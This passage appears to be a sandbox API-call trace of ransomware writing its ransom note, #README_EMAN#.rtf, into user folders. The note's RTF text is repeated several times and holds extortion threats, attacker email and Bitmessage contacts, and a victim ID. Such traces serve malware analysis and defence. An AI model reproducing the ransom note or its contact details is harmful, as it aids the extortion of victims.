e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9fcN", lpUsedDefaultChar=0x0) returned 8717 [0278.211] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.214] CloseHandle (hObject=0x294) returned 1 [0278.214] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\#readme_eman#.rtf")) returned 0xffffffff [0278.214] GetLastError () returned 0x2 [0278.214] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.214] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.216] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 